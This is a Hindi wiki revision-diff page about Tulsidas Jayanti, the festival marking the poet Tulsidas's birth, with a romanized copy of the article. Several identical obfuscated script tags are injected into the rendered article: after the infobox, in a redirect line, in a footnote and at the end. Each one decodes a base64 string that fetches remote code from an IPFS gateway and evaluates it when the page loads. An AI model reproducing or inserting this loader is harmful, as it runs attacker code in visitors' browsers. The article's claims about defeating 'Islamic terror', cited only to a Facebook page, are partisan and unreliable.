Difference between revisions of "तुलसीदास जयंती"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - " महान " to " महान् ")
m (Text replacement - " महान " to " महान् ")
 
(3 intermediate revisions by 2 users not shown)
Line 16: Line 16:
 
|शीर्षक 2=
 
|शीर्षक 2=
 
|पाठ 2=
 
|पाठ 2=
|अन्य जानकारी=तुलसीदासजी का जन्म [[संवत]] 1589 को [[उत्तर प्रदेश]] (वर्तमान [[बाँदा ज़िला]]) के राजापुर नामक ग्राम में हुआ था। इनके पिता का नाम आत्माराम दुबे तथा माता का नाम हुलसी था।  
+
|अन्य जानकारी=तुलसीदासजी का जन्म [[संवत]] 1589 को [[उत्तर प्रदेश]] (वर्तमान [[बाँदा ज़िला]]) के राजापुर नामक [[गाँव]] में हुआ था। उनके [[पिता]] का नाम आत्माराम दुबे तथा [[माता]] का नाम हुलसी था।  
 
|बाहरी कड़ियाँ=
 
|बाहरी कड़ियाँ=
 
|अद्यतन=
 
|अद्यतन=
 
}}
 
}}
'''तुलसीदास जयंती''' [[विक्रम संवत्]] के अनुसार [[श्रावण]] [[मास]] के [[शुक्ल पक्ष]] की [[सप्तमी]] को मनाई जाती है। अधिकतर विद्वान महाकवि [[तुलसीदास|गोस्वामी तुलसीदास]] का जन्म आज के दिन मानते हैं। तुलसीदासजी का जन्म [[संवत]] 1589 को [[उत्तर प्रदेश]] (वर्तमान [[बाँदा ज़िला]]) के राजापुर नामक ग्राम में हुआ था। इनके पिता का नाम आत्माराम दुबे तथा माता का नाम हुलसी था। इनका [[विवाह]] दीनबंधु पाठक की पुत्री रत्नावली से हुआ था। अपनी पत्नी रत्नावली से अत्याधिक प्रेम के कारण तुलसी को रत्नावली की फटकार "लाज न आई आपको दौरे आएहु नाथ" सुननी पड़ी जिससे इनका जीवन ही परिवर्तित हो गया। पत्नी के उपदेश से तुलसी के मन में वैराग्य उत्पन्न हो गया। इनके गुरु बाबा नरहरिदास थे, जिन्होंने इन्हें दीक्षा दी।  
+
'''तुलसीदास जयंती''' [[विक्रम संवत्]] के अनुसार [[श्रावण]] [[मास]] के [[शुक्ल पक्ष]] की [[सप्तमी]] को मनाई जाती है। अधिकतर विद्वान् महाकवि [[तुलसीदास|गोस्वामी तुलसीदास]] का जन्म इसी दिन मानते हैं। सम्पूर्ण [[भारत|भारतवर्ष]] में महान् ग्रंथ [[रामचरितमानस]] के रचयिता गोस्वामी तुलसीदास के स्मरण में तुलसी जयंती मनाई जाती है। श्रावण मास की अमावस्या के सातवें दिन तुलसीदास की जयंती मनाई जाती है। वर्ष [[2017]] में यह तिथि [[30 जुलाई]] है। गोस्वामी तुलसीदास ने कुल 12 पुस्तकों की रचना की है, लेकिन सबसे अधिक ख्याति उनके द्वारा रचित रामचरितमानस को मिली। दरअसल, इस महान् ग्रंथ की रचना तुलसी ने [[अवधी भाषा]] में की है और यह [[भाषा]] [[उत्तर भारत]] के जन-साधारण की भाषा है। इसीलिए तुलसीदास को जन-जन का कवि माना जाता है।
==जन्म विवरण एवं योगदान==
+
==तुलसीदास==
लगभग पांच सौ वर्ष पूर्व संवत 1589 के [[श्रावण]] [[मास]] के [[शुक्ल पक्ष]] की [[सप्तमी]] [[तिथि]] के [[दिन]] अभुक्त [[मूल नक्षत्र]] में गोस्वामी तुलसीदास जी ने जन्म लिया था। [[कलियुग]] के प्रारम्भ होने के पश्चात् सनातन [[हिन्दू धर्म]] यदि किन्हीं महापुरुषों का सबसे अधिक ऋणी है तो वह हैं- [[शंकराचार्य|आदि गुरु शंकराचार्य]] और [[तुलसीदास|गोस्वामी तुलसीदास]]। शंकराचार्य जी ने 2500 वर्ष पूर्व [[बौद्ध]] मत के कारण लुप्त होती [[वैदिक]] परम्पराओं को पुनर्स्थापित करके दिग्दिगंत में सनातन हिन्दू धर्म की विजय वैजयंती फहराई। विदेशी आक्रमणकारियों के कारण मंदिर तोड़े जा रहे थे, गुरुकुल नष्ट किये जा रहे थे, शास्त्र और शास्त्रग्य दोनों विनाश को प्राप्त हो रहे थे, ऐसे भयानक काल में तुलसीदास जी प्रचंड सूर्य की भाँति उदित हुए। उन्होंने जन भाषा में '[[रामचरितमानस|श्री रामचरितमानस]]' की रचना करके उसमें समस्त आगम, निगम, [[पुराण]], [[उपनिषद]] आदि ग्रंथों का सार भर दिया और वैदिक हिन्दू सिद्धांतों को सदा के लिए अमर बना दिया था। अंग्रेज़ों ने हज़ारों भारतीयों को ग़ुलाम बना कर [[मॉरीशस]] और सूरीनाम आदि के निर्जन द्वीपों पर पटक दिया था। उन अनपढ़ ग्रामीणों के पास धर्म के नाम पर मात्र 'श्रीरामचरितमानस' की एक आध प्रति थी। केवल उसी के बल पर आज तक वहां हिन्दू धर्म पूरे तेज के साथ स्थापित है। अनेकों ग्रंथों के रचियेता भगवान् [[राम|श्री राम]] के परम भक्त गोस्वामी तुलसीदास जी भले ही तलवार लेकर लड़ने वाले योद्धा ना हों लेकिन उन्होंने अपनी भक्ति और लेखनी के बल पर इस्लामी आतंक को परास्त करके [[हिन्दू धर्म]] की ध्वजा फहराए रखने में अपूर्व योगदान दिया था।<ref>{{cite web |url=https://hi-in.facebook.com/HindutvaJindabadaThaHaimAuraHamesaRahega/posts/560805187311426 |title=हिंदुत्व जिंदाबाद था जिंदाबाद हैं और जिंदाबाद रहेगा |accessmonthday=13 जुलाई |accessyear=2014 |last= |first= |authorlink= |format= |publisher=फॅसबुक |language=हिंदी }}</ref>
+
{{main|तुलसीदास}}
 +
तुलसीदास जी का जन्म [[संवत]] 1589 को [[उत्तर प्रदेश]] (वर्तमान [[बाँदा ज़िला]]) के राजापुर नामक ग्राम में हुआ था। इनके पिता का नाम आत्माराम दुबे तथा माता का नाम हुलसी था। इनका [[विवाह]] दीनबंधु पाठक की पुत्री रत्नावली से हुआ था। अपनी पत्नी रत्नावली से अत्याधिक प्रेम के कारण तुलसी को रत्नावली की फटकार "लाज न आई आपको दौरे आएहु नाथ" सुननी पड़ी, जिससे इनका जीवन ही परिवर्तित हो गया। पत्नी के उपदेश से तुलसी के मन में वैराग्य उत्पन्न हो गया। इनके गुरु बाबा नरहरिदास थे, जिन्होंने इन्हें दीक्षा दी।  
 +
==योगदान==
 +
[[कलियुग]] के प्रारम्भ होने के पश्चात् सनातन [[हिन्दू धर्म]] यदि किन्हीं महापुरुषों का सबसे अधिक ऋणी है तो वह हैं- [[शंकराचार्य|आदि गुरु शंकराचार्य]] और [[तुलसीदास|गोस्वामी तुलसीदास]]। शंकराचार्य जी ने 2500 वर्ष पूर्व [[बौद्ध]] मत के कारण लुप्त होती [[वैदिक]] परम्पराओं को पुनर्स्थापित करके दिग्दिगंत में सनातन हिन्दू धर्म की विजय वैजयंती फहराई। विदेशी आक्रमणकारियों के कारण मंदिर तोड़े जा रहे थे, गुरुकुल नष्ट किये जा रहे थे, शास्त्र और शास्त्रग्य दोनों विनाश को प्राप्त हो रहे थे, ऐसे भयानक काल में तुलसीदास जी प्रचंड [[सूर्य]] की भाँति उदित हुए। उन्होंने जन भाषा में '[[रामचरितमानस|श्री रामचरितमानस]]' की रचना करके उसमें समस्त आगम, निगम, [[पुराण]], [[उपनिषद]] आदि ग्रंथों का सार भर दिया और वैदिक हिन्दू सिद्धांतों को सदा के लिए अमर बना दिया था।
 +
 
 +
 
 +
[[अंग्रेज़|अंग्रेज़ों]] ने हज़ारों भारतीयों को ग़ुलाम बना कर [[मॉरीशस]] और सूरीनाम आदि के निर्जन द्वीपों पर पटक दिया था। उन अनपढ़ ग्रामीणों के पास धर्म के नाम पर मात्र 'श्रीरामचरितमानस' की एक आध प्रति थी। केवल उसी के बल पर आज तक वहां हिन्दू धर्म पूरे तेज के साथ स्थापित है। अनेकों ग्रंथों के रचियेता भगवान् [[राम|श्री राम]] के परम भक्त गोस्वामी तुलसीदास जी भले ही तलवार लेकर लड़ने वाले योद्धा ना हों लेकिन उन्होंने अपनी भक्ति और लेखनी के बल पर इस्लामी आतंक को परास्त करके [[हिन्दू धर्म]] की ध्वजा फहराए रखने में अपूर्व योगदान दिया था।<ref>{{cite web |url=https://hi-in.facebook.com/HindutvaJindabadaThaHaimAuraHamesaRahega/posts/560805187311426 |title=हिंदुत्व जिंदाबाद था जिंदाबाद हैं और जिंदाबाद रहेगा |accessmonthday=13 जुलाई |accessyear=2014 |last= |first= |authorlink= |format= |publisher=फॅसबुक |language=हिंदी }}</ref>
  
  
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
Line 34: Line 39:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{पर्व और त्योहार}}{{तुलसीदास की रचनाएँ}}
 
{{पर्व और त्योहार}}{{तुलसीदास की रचनाएँ}}
[[Category:पर्व और त्योहार]]
+
[[Category:पर्व और त्योहार]][[Category:तुलसीदास]][[Category:हिन्दू धर्म कोश]][[Category:संस्कृति कोश]]
[[Category:तुलसीदास]][[Category:हिन्दू धर्म कोश]][[Category:धर्म कोश]][[Category:संस्कृति कोश]]
 
 
__INDEX__
 
__INDEX__
__NOTOC__
 

Latest revision as of 11:15, 1 August 2017

tulasidas jayanti
any nam tulasi jayanti
anuyayi bharatiy, hindoo
uddeshy sampoorn bharatavarsh mean mahanh granth ramacharitamanas ke rachayita gosvami tulasidas ke smaran mean tulasidas jayanti manaee jati hai.
tithi shravan shukl paksh saptami
any janakari tulasidasaji ka janm sanvat 1589 ko uttar pradesh (vartaman baanda zila) ke rajapur namak gaanv mean hua tha. unake pita ka nam atmaram dube tatha mata ka nam hulasi tha.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tulasidas jayanti vikram sanvath ke anusar shravan mas ke shukl paksh ki saptami ko manaee jati hai. adhikatar vidvanh mahakavi gosvami tulasidas ka janm isi din manate haian. sampoorn bharatavarsh mean mahanh granth ramacharitamanas ke rachayita gosvami tulasidas ke smaran mean tulasi jayanti manaee jati hai. shravan mas ki amavasya ke satavean din tulasidas ki jayanti manaee jati hai. varsh 2017 mean yah tithi 30 julaee hai. gosvami tulasidas ne kul 12 pustakoan ki rachana ki hai, lekin sabase adhik khyati unake dvara rachit ramacharitamanas ko mili. darasal, is mahanh granth ki rachana tulasi ne avadhi bhasha mean ki hai aur yah bhasha uttar bharat ke jan-sadharan ki bhasha hai. isilie tulasidas ko jan-jan ka kavi mana jata hai.

tulasidas

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tulasidas ji ka janm sanvat 1589 ko uttar pradesh (vartaman baanda zila) ke rajapur namak gram mean hua tha. inake pita ka nam atmaram dube tatha mata ka nam hulasi tha. inaka vivah dinabandhu pathak ki putri ratnavali se hua tha. apani patni ratnavali se atyadhik prem ke karan tulasi ko ratnavali ki phatakar "laj n aee apako daure aehu nath" sunani p di, jisase inaka jivan hi parivartit ho gaya. patni ke upadesh se tulasi ke man mean vairagy utpann ho gaya. inake guru baba naraharidas the, jinhoanne inhean diksha di.

yogadan

kaliyug ke prarambh hone ke pashchath sanatan hindoo dharm yadi kinhian mahapurushoan ka sabase adhik rrini hai to vah haian- adi guru shankarachary aur gosvami tulasidas. shankarachary ji ne 2500 varsh poorv bauddh mat ke karan lupt hoti vaidik paramparaoan ko punarsthapit karake digdigant mean sanatan hindoo dharm ki vijay vaijayanti phaharaee. videshi akramanakariyoan ke karan mandir to de ja rahe the, gurukul nasht kiye ja rahe the, shastr aur shastragy donoan vinash ko prapt ho rahe the, aise bhayanak kal mean tulasidas ji prachand soory ki bhaanti udit hue. unhoanne jan bhasha mean 'shri ramacharitamanas' ki rachana karake usamean samast agam, nigam, puran, upanishad adi granthoan ka sar bhar diya aur vaidik hindoo siddhaantoan ko sada ke lie amar bana diya tha.


aangrezoan ne hazaroan bharatiyoan ko gulam bana kar m aaurishas aur soorinam adi ke nirjan dvipoan par patak diya tha. un anapadh graminoan ke pas dharm ke nam par matr 'shriramacharitamanas' ki ek adh prati thi. keval usi ke bal par aj tak vahaan hindoo dharm poore tej ke sath sthapit hai. anekoan granthoan ke rachiyeta bhagavanh shri ram ke param bhakt gosvami tulasidas ji bhale hi talavar lekar l dane vale yoddha na hoan lekin unhoanne apani bhakti aur lekhani ke bal par islami atank ko parast karake hindoo dharm ki dhvaja phaharae rakhane mean apoorv yogadan diya tha.[1]



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. hiandutv jiandabad tha jiandabad haian aur jiandabad rahega (hiandi) phॅsabuk. abhigaman tithi: 13 julaee, 2014.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>